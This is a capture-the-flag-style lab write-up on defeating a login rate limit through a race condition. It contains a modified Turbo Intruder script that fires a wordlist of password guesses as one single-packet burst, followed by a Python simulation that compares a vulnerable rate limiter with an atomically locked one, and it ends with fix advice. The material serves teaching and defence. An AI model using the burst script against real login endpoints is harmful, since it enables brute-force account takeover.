Bypassing rate limits via race conditions

Description

This lab's login mechanism uses rate limiting to defend against brute-force attacks. However, this can be bypassed due to a race condition.

To solve the lab:

  1. Work out how to exploit the race condition to bypass the rate limit.

  2. Successfully brute-force the password for the user carlos.

  3. Log in and access the admin panel.

  4. Delete the user carlos.

You can log in to your account with the following credentials: wiener:peter.

Approach

Upon analyzing the login functionality, I observed that the application blocks further attempts for an account after three failed logins.

Sending the POST /login request to Repeater, I created a tab group containing 20 copies of the request. Testing the group's sending modes (in sequence and in parallel), I found that sending the group in parallel (the single-packet attack) did not trigger the block: when the guesses arrive together, each is checked against the failed-attempt counter before the other failures have been recorded, so every request in the batch sees a counter below the threshold.

Utilizing the Turbo Intruder extension with the bundled "race-single-packet-attack.py" script, I made slight modifications so that each queued request carries a different password from the clipboard instead of the same request repeated. The request sent to Turbo Intruder must have its password value replaced with the %s placeholder.

def queueRequests(target, wordlists):

    # One HTTP/2 connection: the single-packet attack needs all requests on the same connection
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2
                           )
    # Candidate passwords, one per line, read from the clipboard
    passwords = wordlists.clipboard

    # Each password is substituted for the %s marker in the request.
    # The 'gate' argument withholds the final bytes of every request until openGate is called.
    for password in passwords:
        engine.queue(target.req, password, gate='1')

    # Release the withheld bytes of every gated request at once so they arrive together
    engine.openGate('1')


def handleResponse(req, interesting):
    # Show every response; the successful login stands out by its status code
    table.add(req)

After copying the password wordlists to my clipboard, I launched the attack.

Upon completion, I observed a single 302 response among the results, the redirect issued on a successful login. Logging in with the discovered password "shadow", I accessed the admin panel and deleted the user "carlos", solving the lab.
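To show why firing the guesses simultaneously defeats the limit, here is an added simulation that is not part of the lab or the original writeup. It models a login handler that reads the failed-attempt counter, performs a slow credential check, and only then writes the counter back (the check-then-act window), beside a hardened version that reserves the attempt under a lock before doing any slow work. The user name, the secret, the 20-word list and the 0.2 s verification delay are all constructed for the demonstration; the barrier releases every thread at the same instant, playing the role of the single-packet attack.

```python
"""Check-then-increment race in a login rate limiter, and the atomic fix (constructed example)."""
import threading
import time

LIMIT = 3            # failed attempts allowed before lock-out, as observed in the lab
USER = "carlos"
SECRET = "shadow"    # assumed for the simulation only
SLOW_CHECK = 0.2     # seconds: stands in for a password hash comparison or database round trip

# Constructed 20-entry wordlist; the correct guess sits in the middle
WORDLIST = ["123456", "password", "12345678", "qwerty", "abc123", "monkey", "letmein",
            "dragon", "111111", "baseball", "iloveyou", "trustno1", "shadow", "sunshine",
            "master", "123123", "welcome", "login", "admin", "princess"]


class VulnerableLoginRateLimiter:
    """Reads the counter, does slow work, then writes it back: a TOCTOU window."""

    def __init__(self):
        self.failures = {}

    def attempt(self, username, password):
        count = self.failures.get(username, 0)          # check ...
        if count >= LIMIT:
            return "locked"
        time.sleep(SLOW_CHECK)                           # every concurrent request sleeps here with count == 0
        if password == SECRET:
            self.failures[username] = 0
            return "success"
        self.failures[username] = count + 1              # ... then act: concurrent writers all store 1
        return "failure"


class HardenedLoginRateLimiter:
    """Charges the attempt atomically before verifying anything."""

    def __init__(self):
        self.failures = {}
        self.lock = threading.Lock()

    def attempt(self, username, password):
        with self.lock:                                  # check and increment are a single atomic step
            count = self.failures.get(username, 0)
            if count >= LIMIT:
                return "locked"
            self.failures[username] = count + 1          # reserve the slot before the slow work
        time.sleep(SLOW_CHECK)
        if password == SECRET:
            with self.lock:
                self.failures[username] = 0
            return "success"
        return "failure"


def race(limiter, passwords):
    """Send every guess at the same instant and report (guesses actually checked, password found)."""
    results = []
    barrier = threading.Barrier(len(passwords))

    def worker(pw):
        barrier.wait()                                   # all threads released together
        results.append(limiter.attempt(USER, pw))

    threads = [threading.Thread(target=worker, args=(pw,)) for pw in passwords]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    processed = sum(1 for r in results if r != "locked")
    return processed, "success" in results


def demo():
    """Vulnerable limiter: all 20 guesses are checked. Hardened limiter: only LIMIT of them."""
    vuln_processed, vuln_found = race(VulnerableLoginRateLimiter(), WORDLIST)
    wrong_only = [pw for pw in WORDLIST if pw != SECRET]
    hard_processed, hard_found = race(HardenedLoginRateLimiter(), wrong_only)
    return vuln_processed, vuln_found, hard_processed, hard_found


if __name__ == "__main__":
    print(demo())
```

The vulnerable limiter checks all 20 guesses and finds the password, because each thread reads a counter of zero before any of them writes. The hardened limiter lets exactly three guesses through and rejects the other seventeen, regardless of how they are scheduled, because the increment happens inside the same critical section as the check. The same reasoning applies to a real deployment: the counter update must be atomic with the check (a database row lock, an atomic increment in a cache, or a single UPDATE ... WHERE count < limit), not performed after the credential verification has completed.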
